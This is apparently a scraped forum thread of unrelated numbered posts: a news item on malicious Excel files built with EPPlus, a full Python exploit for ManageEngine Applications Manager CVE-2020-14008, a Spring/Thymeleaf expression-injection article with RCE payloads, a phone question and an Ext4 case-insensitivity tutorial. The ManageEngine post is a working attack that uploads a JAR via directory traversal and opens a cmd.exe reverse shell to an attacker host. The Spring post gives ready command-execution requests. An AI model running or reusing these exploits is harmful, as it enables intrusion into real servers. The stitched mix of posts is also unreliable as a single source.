According to NVISO, this was because the documents weren't compiled in the standard Microsoft Office software, but with a .NET library called EPPlus. Developers typically use this library as part of their applications to add "Export as Excel" or "Save as spreadsheet" functions. The library can be used to generate files in a wide variety of spreadsheet formats, and even supports Excel 2019. NVISO says the Epic Manchego gang appears to have used EPPlus to generate spreadsheet files in the Office Open XML (OOXML) format. The OOXML spreadsheet files generated by Epic Manchego lacked a section of compiled VBA code, specific to Excel documents compiled in Microsoft's proprietary Office software. Some antivirus products and email scanners specifically look for this portion of VBA code to search for possible signs of malicious Excel docs, which would explain why spreadsheets generated by the Epic Manchego gang had lower detection rates than other malicious Excel files. This blob of compiled VBA code is usually where an attacker's malicious code would be stored. However, this doesn't mean the files were clean.
NVISO says that Epic Manchego simply stored their malicious code in a custom VBA code format, which was also password-protected to prevent security systems and researchers from analyzing its content.

Image: NVISO

But despite using a different method to generate their malicious Excel documents, the EPPlus-based spreadsheet files still worked like any other Excel document.

Active since June

The malicious documents (also called maldocs) still contained a malicious macro script. If users who opened the Excel files allowed the script to execute (by clicking the "Enable editing" button), the macros would download and install malware on the victim's systems. The final payloads were classic infostealer trojans like Azorult, AgentTesla, Formbook, Matiex, and njRat, which would dump passwords from the user's browsers, email clients, and FTP clients, and send them to Epic Manchego's servers. While the decision to use EPPlus to generate their malicious Excel files might have had some benefits in the beginning, it also ended up hurting Epic Manchego in the long run, as it allowed the NVISO team to very easily detect all their past operations by searching for odd-looking Excel documents. In the end, NVISO said it discovered more than 200 malicious Excel files linked to Epic Manchego, with the first one dating back to June 22 this year.

Image: NVISO

NVISO says this group appears to be experimenting with this technique, and since the first attacks, they have increased both their activity and the sophistication of their attacks, suggesting this might see broader use in the future. Nevertheless, NVISO researchers weren't totally surprised that malware groups are now using EPPlus. Indicators of compromise and a technical breakdown of the malicious EPPlus-rendered Excel files are available in NVISO Labs' Epic Manchego report. Via zdnet.com
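Since the missing compiled-VBA blob is what made these files stand out, a scanner-style check is easy to sketch. This is an illustrative snippet, not NVISO's actual tooling: OOXML spreadsheets are ZIP archives, and Office-built macro workbooks carry the compiled VBA as a member named xl/vbaProject.bin.

```python
import io
import zipfile

def has_compiled_vba(xlsx) -> bool:
    """Return True if the OOXML archive contains a compiled VBA blob.

    Office-built macro workbooks (.xlsm) ship it as xl/vbaProject.bin;
    EPPlus-generated files typically lack this member.
    """
    with zipfile.ZipFile(xlsx) as z:
        return any(name.endswith("vbaProject.bin") for name in z.namelist())

# Build a minimal EPPlus-style workbook in memory: no vbaProject.bin inside,
# so a scanner keying only on the compiled-VBA member finds nothing.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("[Content_Types].xml", "<Types/>")
    z.writestr("xl/workbook.xml", "<workbook/>")
buf.seek(0)
print(has_compiled_vba(buf))  # False
```

The point of the sketch is the asymmetry NVISO describes: a detection rule keyed on the compiled blob misses OOXML files that store their macros elsewhere.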
  17. #!/usr/bin/python3 # Exploit Title: ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated) # Google Dork: None # Date: 2020-09-04 # Exploit Author: Hodorsec # Vendor Homepage: https://manageengine.co.uk # Vendor Vulnerability Description: https://manageengine.co.uk/products/applications_manager/security-updates/security-updates-cve-2020-14008.html # Software Link: http://archives.manageengine.com/applications_manager/14720/ # Version: Until version 14720 # Tested on: version 12900 and version 14700 # CVE : CVE-2020-14008 # Summary: # POC for proving ability to execute malicious Java code in uploaded JAR file as an Oracle Weblogic library to connect to Weblogic servers # Exploits the newInstance() and loadClass() methods being used by the "WeblogicReference", when attempting a Credential Test for a new Monitor # When invoking the Credential Test, a call is being made to lookup a possibly existing "weblogic.jar" JAR file, using the "weblogic.jndi.Environment" class and method # Vulnerable code: # Lines 129 - 207 in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java # 129 /* */ public static MBeanServer lookupMBeanServer(String hostname, String portString, String username, String password, int version) throws Exception { # 130 /* 130 */ ClassLoader current = Thread.currentThread().getContextClassLoader(); # 131 /* */ try { # 132 /* 132 */ boolean setcredentials = false; # 133 /* 133 */ String url = "t3://" + hostname + ":" + portString; # 134 /* 134 */ JarLoader jarLoader = null; # 135 /* */ # ....<SNIP>.... # 143 /* */ } # 144 /* 144 */ else if (version == 8) # 145 /* */ { # 146 /* 146 */ if (new File("./../working/classes/weblogic/version8/weblogic.jar").exists()) # 147 /* */ { # 148 /* */ # 149 /* 149 */ jarLoader = new JarLoader("." + File.separator + ".." 
+ File.separator + "working" + File.separator + "classes" + File.separator + "weblogic" + File.separator + "version8" + File.separator + "weblogic.jar"); # 150 /* */ # ....<SNIP>.... # 170 /* 170 */ Thread.currentThread().setContextClassLoader(jarLoader); # 171 /* 171 */ Class cls = jarLoader.loadClass("weblogic.jndi.Environment"); # 172 /* 172 */ Object env = cls.newInstance(); # Example call for MAM version 12900: # $ python3 poc_mam_weblogic_upload_and_exec_jar.py https://192.168.252.12:8443 admin admin weblogic.jar # [*] Visiting page to retrieve initial cookies... # [*] Retrieving admin cookie... # [*] Getting base directory of ManageEngine... # [*] Found base directory: C:\Program Files (x86)\ManageEngine\AppManager12 # [*] Creating JAR file... # Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true # Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true # added manifest # adding: weblogic/jndi/Environment.class(in = 1844) (out= 1079)(deflated 41%) # [*] Uploading JAR file... # [*] Attempting to upload JAR directly to targeted Weblogic folder... # [*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function! # [*] Running the Weblogic credentialtest which triggers the code in the JAR... # [*] Check your shell... # Function flow: # 1. Get initial cookie # 2. Get valid session cookie by logging in # 3. Get base directory of installation # 4. Generate a malicious JAR file # 5. Attempt to directly upload JAR, if success, jump to 7 # 6. Create task with random ID to copy JAR file to expected Weblogic location # 7. Execute task # 8. Delete task for cleanup # 9. 
Run the vulnerable credentialTest, using the malicious JAR import requests import urllib3 import shutil import subprocess import os import sys import random import re from lxml import html # Optionally, use a proxy # proxy = "http://<user>:<pass>@<proxy>:<port>" proxy = "" os.environ['http_proxy'] = proxy os.environ['HTTP_PROXY'] = proxy os.environ['https_proxy'] = proxy os.environ['HTTPS_PROXY'] = proxy # Disable cert warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Set timeout timeout = 10 # Handle CTRL-C def keyboard_interrupt(): """Handles keyboardinterrupt exceptions""" print("\n\n[*] User requested an interrupt, exiting...") exit(0) # Custom headers def http_headers(): headers = { 'User-Agent': 'Mozilla', } return headers def get_initial_cookie(url,headers): print("[*] Visiting page to retrieve initial cookies...") target = url + "/index.do" r = requests.get(target,headers=headers,timeout=timeout,verify=False) return r.cookies def get_valid_cookie(url,headers,initial_cookies,usern,passw): print("[*] Retrieving admin cookie...") appl_cookie = "JSESSIONID_APM_9090" post_data = {'clienttype':'html', 'webstart':'', 'j_username':usern, 'ScreenWidth':'1280', 'ScreenHeight':'709', 'username':usern, 'j_password':passw, 'submit':'Login'} target = url + "/j_security_check" r = requests.post(target,data=post_data,headers=headers,cookies=initial_cookies,timeout=timeout,verify=False) res = r.text if "Server responded in " in res: return r.cookies else: print("[!] 
No valid response from used session, exiting!\n") exit(-1) def get_base_dir(url,headers,valid_cookie): print("[*] Getting base directory of ManageEngine...") target = url + "/common/serverinfo.do" params = {'service':'AppManager', 'reqForAdminLayout':'true'} r = requests.get(target,params=params,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) tree = html.fromstring(r.content) pathname = tree.xpath('//table[@class="lrbtborder"]/tr[6]/td[2]/@title') base_dir = pathname[0] print("[*] Found base directory: " + base_dir) return base_dir def create_jar(command,jarname,revhost,revport): print("[*] Creating JAR file...") # Variables classname = "Environment" pkgname = "weblogic.jndi" fullname = pkgname + "." + classname manifest = "MANIFEST.MF" # Directory variables curdir = os.getcwd() metainf_dir = "META-INF" maindir = "weblogic" subdir = maindir + "/jndi" builddir = curdir + "/" + subdir # Check if directory exist, else create directory try: if os.path.isdir(builddir): pass else: os.makedirs(builddir) except OSError: print("[!] 
Error creating local directory \"" + builddir + "\", check permissions...") exit(-1) # Creating the text file using given parameters javafile = '''package ''' + pkgname + '''; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.Socket; import java.util.concurrent.TimeUnit; public class ''' + classname + ''' { // This method is being called by lookupMBeanServer() in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java // Uses the jarLoader.loadClass() method to load and initiate a new instance via newInstance() public void setProviderUrl(String string) throws Exception { System.out.println("Hello from setProviderUrl()"); connect(); } // Normal main() entry public static void main(String args[]) throws Exception { System.out.println("Hello from main()"); // Added delay to notice being called from main() TimeUnit.SECONDS.sleep(10); connect(); } // Where the magic happens public static void connect() throws Exception { String host = "''' + revhost + '''"; int port = ''' + str(revport) + '''; String[] cmd = {"''' + command + '''"}; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s=new Socket(host,port); InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream(); while(!s.isClosed()) { while(pi.available()>0) so.write(pi.read()); while(pe.available()>0) so.write(pe.read()); while(si.available()>0) po.write(si.read()); so.flush(); po.flush(); try { p.exitValue(); break; } catch (Exception e){ } }; p.destroy(); s.close(); } }''' # Output file to desired directory os.chdir(builddir) print(javafile,file=open(classname + ".java","w")) # Go to previous directory to create JAR file os.chdir(curdir) # Create the compiled .class file cmdCompile = "javac --release 7 " + subdir + "/*.java" process = subprocess.call(cmdCompile,shell=True) # Creating Manifest file try: if os.path.isdir(metainf_dir): pass else: 
os.makedirs(metainf_dir) except OSError: print("[!] Error creating local directory \"" + metainf_dir + "\", check permissions...") exit(-1) print("Main-Class: " + fullname,file=open(metainf_dir + "/" + manifest,"w")) # Create JAR file cmdJar = "jar cmvf " + metainf_dir + "/" + manifest + " " + jarname + " " + subdir + "/*.class" process = subprocess.call(cmdJar,shell=True) # Cleanup directories try: shutil.rmtree(metainf_dir) shutil.rmtree(maindir) except: print("[!] Error while cleaning up directories.") return True def upload_jar(url,headers,valid_cookie,jarname,rel_path): print("[*] Uploading JAR file...") target = url + "/Upload.do" path_normal = './' path_trav = rel_path jar = {'theFile':(jarname,open(jarname, 'rb'))} print("[*] Attempting to upload JAR directly to targeted Weblogic folder...") post_data = {'uploadDir':path_trav} r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False) res = r_upload.text if "successfully uploaded" not in res: print("[!] Failed to upload JAR directly, continue to add and execute job to move JAR...") post_data = {'uploadDir':path_normal} jar = {'theFile':(jarname,open(jarname, 'rb'))} r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False) return "normal_path" else: print("[*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function!") return "trav_path" def create_task(url,headers,valid_cookie,action_name,rel_path,work_dir): print("[*] Creating a task to move the JAR file to relative path: " + rel_path + "...") valid_resp = "Execute Program succesfully created." 
target = url + "/adminAction.do" post_data = {'actions':'/adminAction.do?method=showExecProgAction&haid=null', 'method':'createExecProgAction', 'id':'0', 'displayname':action_name, 'serversite':'local', 'choosehost':'-2', 'prompt':'$', 'command':'move weblogic.jar ' + rel_path, 'execProgExecDir':work_dir, 'abortafter':'10', 'cancel':'false'} r = requests.post(target,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) res = r.text found_id = "" if action_name in res: tree = html.fromstring(r.content) actionurls = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/@onclick') actionnames = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/text()') i = 0 for name in actionnames: for url in actionurls: if action_name in name: found_id = re.search(".*actionid=(.+?)','", actionurls[i]).group(1) print("[*] Found actionname: " + action_name + " with found actionid " + found_id) break i+=1 return found_id else: print("[!] Actionname not found. Task probably wasn't created, please check. Exiting.") exit(-1) def exec_task(url,headers,valid_cookie,found_id): print("[*] Executing created task with id: " + found_id + " to copy JAR...") valid_resp = "has been successfully executed" target = url + "/common/executeScript.do" params = {'method':'testAction', 'actionID':found_id, 'haid':'null'} r = requests.get(target,params=params,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) res = r.text if valid_resp in res: print("[*] Task " + found_id + " has been executed successfully") else: print("[!] Task not executed. 
Check requests, exiting...") exit(-1) return def del_task(url,headers,valid_cookie,found_id): print("[*] Deleting created task as JAR has been copied...") target = url + "/adminAction.do" params = {'method':'deleteProgExecAction'} post_data = {'haid':'null', 'headercheckbox':'on', 'progcheckbox':found_id} r = requests.post(target,params=params,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) def run_credtest(url,headers,valid_cookie): print("[*] Running the Weblogic credentialtest which triggers the code in the JAR...") target = url + "/testCredential.do" post_data = {'method':'testCredentialForConfMonitors', 'serializedData':'url=/jsp/newConfType.jsp', 'searchOptionValue':'', 'query':'', 'addtoha':'null', 'resourceid':'', 'montype':'WEBLOGIC:7001', 'isAgentEnabled':'NO', 'resourcename':'null', 'isAgentAssociated':'false', 'hideFieldsForIT360':'null', 'childNodesForWDM':'[]', 'csrfParam':'', 'type':'WEBLOGIC:7001', 'displayname':'test', 'host':'localhost', 'netmask':'255.255.255.0', 'resolveDNS':'False', 'port':'7001', 'CredentialDetails':'nocm', 'cmValue':'-1', 'version':'WLS_8_1', 'sslenabled':'False', 'username':'test', 'password':'test', 'pollinterval':'5', 'groupname':''} print("[*] Check your shell...") requests.post(target,data=post_data,headers=headers,cookies=valid_cookie,verify=False) return # Main def main(argv): if len(sys.argv) == 6: url = sys.argv[1] usern = sys.argv[2] passw = sys.argv[3] revhost = sys.argv[4] revport = sys.argv[5] else: print("[*] Usage: " + sys.argv[0] + " <url> <username> <password> <reverse_shell_host> <reverse_shell_port>") print("[*] Example: " + sys.argv[0] + " https://192.168.252.12:8443 admin admin 192.168.252.14 6666\n") exit(0) # Do stuff try: # Set HTTP headers headers = http_headers() # Relative path to copy the malicious JAR file rel_path = "classes/weblogic/version8/" # Generate a random ID to use for the task name and task tracking random_id = str(random.randrange(0000,9999)) # 
Action_name used for displaying actions in overview action_name = "move_weblogic_jar" + random_id # Working dir to append to base dir base_append = "\\working\\" # Name for JAR file to use jarname = "weblogic.jar" # Command shell to use cmd = "cmd.exe" # Execute functions initial_cookies = get_initial_cookie(url,headers) valid_cookie = get_valid_cookie(url,headers,initial_cookies,usern,passw) work_dir = get_base_dir(url,headers,valid_cookie) + base_append create_jar(cmd,jarname,revhost,revport) status_jar = upload_jar(url,headers,valid_cookie,jarname,rel_path) # Check if JAR can be uploaded via Directory Traversal # If so, no need to add and exec actions; just run the credentialtest directly if status_jar == "trav_path": run_credtest(url,headers,valid_cookie) # Cannot be uploaded via Directory Traversal, add and exec actions to move JAR. Lastly, run the vulnerable credentialtest elif status_jar == "normal_path": found_id = create_task(url,headers,valid_cookie,action_name,rel_path,work_dir) exec_task(url,headers,valid_cookie,found_id) del_task(url,headers,valid_cookie,found_id) run_credtest(url,headers,valid_cookie) except requests.exceptions.Timeout: print("[!] Timeout error\n") exit(-1) except requests.exceptions.TooManyRedirects: print("[!] Too many redirects\n") exit(-1) except requests.exceptions.ConnectionError: print("[!] Not able to connect to URL\n") exit(-1) except requests.exceptions.RequestException as e: print("[!] " + e) exit(-1) except requests.exceptions.HTTPError as e: print("[!] Failed with error code - " + e.code + "\n") exit(-1) except KeyboardInterrupt: keyboard_interrupt() # If we were called as a program, go execute the main function. if __name__ == "__main__": main(sys.argv[1:]) Source
  18. In this article, we explain how dangerous unrestricted view name manipulation in the Spring Framework can be. Before doing so, let's look at the simplest Spring application that uses Thymeleaf as a templating engine:

HelloController.java:

@Controller
public class HelloController {
    @GetMapping("/")
    public String index(Model model) {
        model.addAttribute("message", "happy birthday");
        return "welcome";
    }
}

Due to the use of the @Controller and @GetMapping("/") annotations, this method will be called for every HTTP GET request for the root URL ('/'). It does not have any parameters and returns a static string "welcome". The Spring framework interprets "welcome" as a View name and tries to find the file "resources/templates/welcome.html" in the application resources. If it finds it, it renders the view from the template file and returns it to the user. If the Thymeleaf view engine is in use (the most popular choice for Spring), the template may look like this:

welcome.html:

<!DOCTYPE HTML>
<html lang="en" xmlns:th="http://www.thymeleaf.org">
<div th:fragment="header">
    <h3>Spring Boot Web Thymeleaf Example</h3>
</div>
<div th:fragment="main">
    <span th:text="'Hello, ' + ${message}"></span>
</div>
</html>

The Thymeleaf engine also supports file layouts. For example, you can specify a fragment in the template by using <div th:fragment="main"> and then request only this fragment from the view:

@GetMapping("/main")
public String fragment() {
    return "welcome :: main";
}

Thymeleaf is intelligent enough to return only the 'main' div from the welcome view, not the whole document. From a security perspective, there may be a situation where a template name or a fragment is concatenated with untrusted data.
For example, with a request parameter:

@GetMapping("/path")
public String path(@RequestParam String lang) {
    return "user/" + lang + "/welcome"; //template path is tainted
}

@GetMapping("/fragment")
public String fragment(@RequestParam String section) {
    return "welcome :: " + section; //fragment is tainted
}

The first case may contain a potential path traversal vulnerability, but a user is limited to the 'templates' folder on the server and cannot view any files outside it. The obvious exploitation approach would be to try to find a separate file upload and create a new template, but that's a different issue. Luckily for bad guys, before loading the template from the filesystem, Spring's ThymeleafView class parses the template name as an expression:

try {
    // By parsing it as a standard expression, we might profit from the expression cache
    fragmentExpression = (FragmentExpression) parser.parseExpression(context, "~{" + viewTemplateName + "}");
}

So, the aforementioned controllers may be exploited not by path traversal, but by expression language injection:

Exploit for /path (should be url-encoded):
GET /path?lang=__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x HTTP/1.1

In this exploit we use the power of expression preprocessing: by surrounding the expression with __${ and }__::.x, we can make sure it's executed by Thymeleaf no matter what the prefix or suffix is. To summarize, whenever untrusted data reaches the view name returned from a controller, it can lead to expression language injection and therefore to Remote Code Execution.

Even more magic

In the previous examples, controllers return strings, explicitly telling Spring what view name to use, but that's not always the case.
As described in the documentation, for some return types, such as void, java.util.Map or org.springframework.ui.Model, the view name is not supplied by the controller at all; Spring derives it implicitly. It means that a controller like this:

@GetMapping("/doc/{document}")
public void getDocument(@PathVariable String document) {
    log.info("Retrieving " + document);
}

may look absolutely innocent at first glance; it does almost nothing. But since Spring does not know what View name to use, it takes it from the request URI. Specifically, DefaultRequestToViewNameTranslator does the following:

/**
 * Translates the request URI of the incoming {@link HttpServletRequest}
 * into the view name based on the configured parameters.
 * @see org.springframework.web.util.UrlPathHelper#getLookupPathForRequest
 * @see #transformPath
 */
@Override
public String getViewName(HttpServletRequest request) {
    String lookupPath = this.urlPathHelper.getLookupPathForRequest(request, HandlerMapping.LOOKUP_PATH);
    return (this.prefix + transformPath(lookupPath) + this.suffix);
}

So it also becomes vulnerable, as user-controlled data (the URI) goes directly into the view name and is resolved as an expression.

Exploit for /doc (should be url-encoded):
GET /doc/__${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x HTTP/1.1

Safe case: ResponseBody

There are also some cases when a controller returns a user-controlled value but is not vulnerable to view name manipulation. For example, when the controller is annotated with @ResponseBody:

@GetMapping("/safe/fragment")
@ResponseBody
public String safeFragment(@RequestParam String section) {
    return "welcome :: " + section; //FP, as @ResponseBody annotation tells Spring to process the return value as body, instead of view name
}

In this case, Spring Framework does not interpret it as a view name, but just returns this string in the HTTP Response. The same applies to @RestController on a class, as internally it inherits @ResponseBody.
Safe case: A redirect

@GetMapping("/safe/redirect")
public String redirect(@RequestParam String url) {
    return "redirect:" + url; //CWE-601, as we can control the hostname in redirect
}

When the view name is prefixed with "redirect:", the logic is also different. In this case, Spring no longer uses ThymeleafView but a RedirectView, which does not perform expression evaluation. This example still has an open redirect vulnerability, but it is certainly not as dangerous as RCE via expression evaluation.

Safe case: Response is already processed

@GetMapping("/safe/doc/{document}")
public void getDocument(@PathVariable String document, HttpServletResponse response) {
    log.info("Retrieving " + document); //FP
}

This case is very similar to one of the previous vulnerable examples, but since the controller has HttpServletResponse in its parameters, Spring considers that it has already processed the HTTP Response, so view name resolution simply does not happen. This check exists in the ServletResponseMethodArgumentResolver class.

Conclusion

Spring is a framework with a bit of magic: it allows developers to write less code, but sometimes this magic turns black. It's important to understand the situations when user-controlled data reaches sensitive variables (such as view names) and guard against them accordingly. Stay safe.

Test locally

Java 8+ and Maven required:

cd spring-view-manipulation
mvn spring-boot:run
curl 'localhost:8090/path?lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22id%22).getInputStream()).next()%7d__::.x'

Credits

This project was co-authored by Michael Stepankin and Giuseppe Trovato at Veracode. The authors would like to thank Aleksei Tiurin from Acunetix for the excellent research on SSTI vulnerabilities in Thymeleaf.

Source: github.com
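As the exploit listings note, the payloads must be URL-encoded before they are sent (the curl invocation above does this by hand). A quick, illustrative way to produce the encoded form with Python's standard library:

```python
from urllib.parse import quote

# The /path exploit payload from the article, before encoding.
payload = ('__${new java.util.Scanner(T(java.lang.Runtime).getRuntime()'
           '.exec("id").getInputStream()).next()}__::.x')

# safe='' forces percent-encoding of every reserved character, including '/'.
encoded = quote(payload, safe='')
print(encoded)
```

Any URL-encoder will do; the only requirement is that the ${...} and :: characters survive transport to the server intact.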
  19. // My apologies, I have that idiot on ignore.
  20. Hi, can absolutely all the data be transferred from one phone to another identical one? Including the pattern lock (Android). *Without a service shop. PS: I got caught in the rain after figuring it was warm outside; P.S.2: it overheats; below 15% battery it doesn't act up, but beyond that the brightness changes on its own and it displays "Seamless Screen Error". Thanks for your attention. I'm looking forward to your reply.
  21. Linux 5.2 was released over one year ago and with it, a new feature was added to support optimized case-insensitive file name lookups in the Ext4 filesystem - the first of the native Linux filesystems to do so. Now, one year after this quite controversial feature was made available, Collabora and others keep building on top of it to make it more and more useful for system developers and end users. Therefore, this seems like as good a time as any to take a look at why this was merged, and how to put it to work. More recently, f2fs has started to support this feature as well, following the Ext4 implementation and framework, thanks to an effort led by Google. Most, if not all, of the information described here also applies to f2fs, with small changes to the commands used to configure the superblock.

Why Case-insensitive in the kernel?

A file name is a text string used to uniquely identify a file (in this context, "directory" is the same as a file) at a specific level of the directory hierarchy. While, from the operating system's point of view, it doesn't matter what the file name is, as long as it is unique, meaningful file names are essential for the end user, since they are the main key to locating and retrieving data. In other words, a meaningful file name is what people rely upon to find their valuable documents, pictures and spreadsheets. Traditionally, Linux (and Unix) filesystems have always treated file names as an opaque byte sequence without any special meaning, requiring users to submit the exact match of the name to find the file in the filesystem. But that is not how humans operate. When people write titles, "important report.ods" and "IMPORTANT REPORT.ods" usually mean the same piece of data, and you don't care how it was written when creating it. We care about the content and the semantics of the words IMPORTANT and REPORT.
In English, the only situation where different spellings of a word mean the same thing is when dealing with uppercase and lowercase, but for other languages, that is not the case. Some languages have different scripts to represent the same information, and it makes sense for a user not to care which writing system the file was originally titled in when retrieving the data later. Most of these linguistic differences have been solved by userspace applications in the past, but bringing this knowledge into the kernel allows us to resolve important bottlenecks for applications ported from other operating systems, like Windows games, which cannot simply be recompiled to understand that they are running on Linux and that the filesystem is now case-sensitive. In fact, making the kernel understand the process of language normalization and casefolding allows us to optimize our disk storage such that the system can quickly retrieve the information requested. The end result is clear: a much more user-friendly Linux experience for end users and a much better platform to run beloved Windows games with Steam on Linux.

Before enabling

⚠ This is very important. Before enabling the feature, make sure your kernel supports case-insensitive Ext4 and that the encoding version you plan to use is supported. The kernel supports case-insensitive Ext4 if it was built with CONFIG_UNICODE=y. If you are not sure, you can verify it on a booted kernel by reading the sysfs file below. If it doesn't exist, case-insensitive support was not compiled into your kernel.

$ cat /sys/fs/ext4/features/casefold

Currently, the kernel supports UTF-8 up to version 12.1. mkfs will always choose the latest version, but attempting to run a filesystem with a more recent UTF-8 version than the kernel supports is risky, and to preserve your data, the kernel will refuse to mount such a filesystem. To solve this issue, a kernel update is required, or mkfs can be configured to use an older version.
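The pre-flight check above is easy to script. A minimal sketch in Python, assuming only the two sysfs paths quoted in this article (on kernels built without CONFIG_UNICODE the first file simply does not exist, and the second one is only present on kernels that carry the queued patch):

```python
from pathlib import Path
from typing import Optional


def ext4_casefold_supported() -> bool:
    """True if the running kernel advertises ext4 casefold support.

    The file exists only when the kernel was built with CONFIG_UNICODE=y.
    """
    return Path("/sys/fs/ext4/features/casefold").exists()


def kernel_unicode_version() -> Optional[str]:
    """Latest Unicode revision the kernel supports, if exposed.

    Returns None on kernels that do not (yet) provide this sysfs file.
    """
    p = Path("/sys/fs/unicode/version")
    return p.read_text().strip() if p.exists() else None
```

Running these before `mkfs` avoids creating a filesystem the current kernel would refuse to mount.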
A patch is queued for the next kernel release to report on sysfs the latest supported revision of Unicode. Notice that the following file might not be available on your system, even if CONFIG_UNICODE is enabled.

$ cat /sys/fs/unicode/version

Enabling case-insensitive

First of all, make sure you've read the section "Before enabling". Failing to follow those instructions may render your filesystem unmountable on your current kernel.

Enabling the feature takes two steps. The first is to enable the filesystem-wide casefold feature on the volume's superblock. This doesn't immediately make any directories case-insensitive, so don't worry, but it prepares the disk to support casefolded directories. It also configures what encoding will be used. The second step is to configure a specific directory to be case-insensitive. But first, let's see how to create a disk supporting case-insensitivity.

Creating a filesystem that supports case-insensitive

When creating a filesystem, you need to set the casefold feature in mkfs:

$ mkfs -t ext4 -O casefold /dev/vda

After that, you can verify that the filesystem has the feature:

$ dumpe2fs -h /dev/vda | grep 'Filesystem features'
dumpe2fs 1.45.6 (20-Mar-2020)
Filesystem features: has_journal ext_attr resize_inode dir_index filetype extent 64bit flex_bg casefold sparse_super large_file huge_file dir_nlink extra_isize metadata_csum

The feature is enabled in the filesystem on /dev/vda if the line above includes 'casefold'. Alternatively, you can mount the filesystem and check dmesg for the mount line:

$ mount /dev/vda /mnt
$ dmesg | tail
EXT4-fs (vda): Using encoding defined by superblock: utf8-12.1.0 with flags 0x0
EXT4-fs (vda): mounted filesystem with ordered data mode. Opts: (null)

From the output above, vda was mounted with case-insensitive support enabled and the utf8-12.1.0 encoding.
Strict mode

Historically, any byte other than the slash ('/') and the null byte ('\0') is a valid part of a file name. This is because Unix filesystems see path names as sequences of slash-separated components that are just opaque byte sequences, without any meaning assigned to them. Higher-level userspace software gives them meaning by interpreting them as characters for rendering.

When dealing with case-insensitivity, however, the kernel needs to inspect and understand what a character really is and what the rules for case-folding are. That is the reason we adopt an encoding in the kernel, as we did with UTF-8. But, for any encoding one may choose, the requirements for what a valid name is are much stricter. In fact, there are several byte sequences that are simply invalid text in UTF-8. When a program asks the kernel to create a file with such a name, the kernel needs to decide whether to pretend the name is valid somehow or to return an error to the application.

The vast majority of applications don't care about case-insensitivity and expect a file name to just be accepted as long as it is a valid Unix name. These applications will fail if the kernel throws an error on what they expect to be a valid name, so by default, if an application tries to use an invalid name in a case-insensitive directory, the kernel will just let it happen and treat that single file as an opaque byte sequence. This is fine, but case-insensitivity will not work for that one file.

There are cases, on the other hand, where we want to be strict about what is accepted by the filesystem. Having bad file names mixed with good ones is confusing and leaves room for programs to misbehave. For those users, ext4 has a strict mode, which causes any attempt to create or rename a file with a bad name to fail and return an error to the application.
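The rule strict mode enforces can be mimicked in userspace. A hedged sketch: validating the name as UTF-8 (plus the universal '/' and NUL restrictions) approximates the kernel's check; it is an illustration of the idea, not the kernel's actual code:

```python
def is_valid_strict_name(name: bytes) -> bool:
    """Approximate ext4 strict-mode validation of a file name.

    A name must not contain '/' or NUL (never allowed on Unix),
    and under strict mode it must also be valid UTF-8 text.
    """
    if b"/" in name or b"\x00" in name:
        return False
    try:
        name.decode("utf-8")
        return True
    except UnicodeDecodeError:
        # Invalid byte sequence: strict mode would reject this name
        # with an error instead of storing it as opaque bytes.
        return False


print(is_valid_strict_name("café".encode("utf-8")))  # True
print(is_valid_strict_name(b"caf\xe9"))              # False: latin-1 bytes, not UTF-8
```

The second name is exactly the kind of file that a default (non-strict) casefold directory would accept but treat as an opaque byte sequence.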
To build an Ext4 filesystem with strict mode enabled, use:

$ mkfs -t ext4 -O casefold -E encoding_flags=strict /dev/vda

Mounting the case-insensitive filesystem

If everything went fine and mkfs (or tune2fs) returned without any errors, the next time you mount this filesystem your kernel log will show something like the line below:

$ mount /dev/sda1 /mnt
$ dmesg | tail
EXT4-fs (sda1): Using encoding defined by superblock: utf8-12.1.0 with flags 0x0

This carries two important pieces of information. The first is the encoding used, which, in the example above, is UTF-8 supporting version 12.1.0 of the Unicode specification. The second piece of information is the flags argument, in this case 0x0, which modifies the behavior of the filesystem when dealing with casefolded directories. At the time of this writing, the only flag supported is strict mode, in which case the flag mask would be 0x1.

Making specific directories case-insensitive

After mounting a filesystem with the casefold feature enabled, it is possible to flip the 'Casefold' inode attribute ('+F') on empty directories to make the lookup of files inside them case-insensitive:

$ mkdir CI_dir
$ chattr +F CI_dir

With that setting enabled, the following should succeed, instead of the last command returning "No such file or directory":

$ touch CI_dir/hello_world
$ ls CI_dir/HELLO_WORLD

The directory's case-sensitivity can be verified using lsattr. For instance, in the example below, the F letter indicates that the CI_dir directory is case-insensitive.

$ lsattr .
-------------------- ./CS_dir
----------------F--- ./CI_dir

To revert the setting and make CI_dir case-sensitive once again, the directory must be emptied and then the Casefold attribute removed:

$ rm CI_dir/*
$ chattr -F CI_dir
$ lsattr .
-------------------- ./CS_dir
-------------------- ./CI_dir
-------------------- ./lost+found

It is a bit annoying to require the directory to be empty to flip the case-insensitive flag, but that is a technical requirement at the moment and unlikely to change in the future. In fact, to make the data of a case-insensitive directory accessible in a case-sensitive manner, it would be much easier to move it to a new directory:

$ mkdir CS_dir
$ mv CI_dir/* CS_dir/
$ rm -r CI_dir

This has a similar effect, from a simplistic point of view.

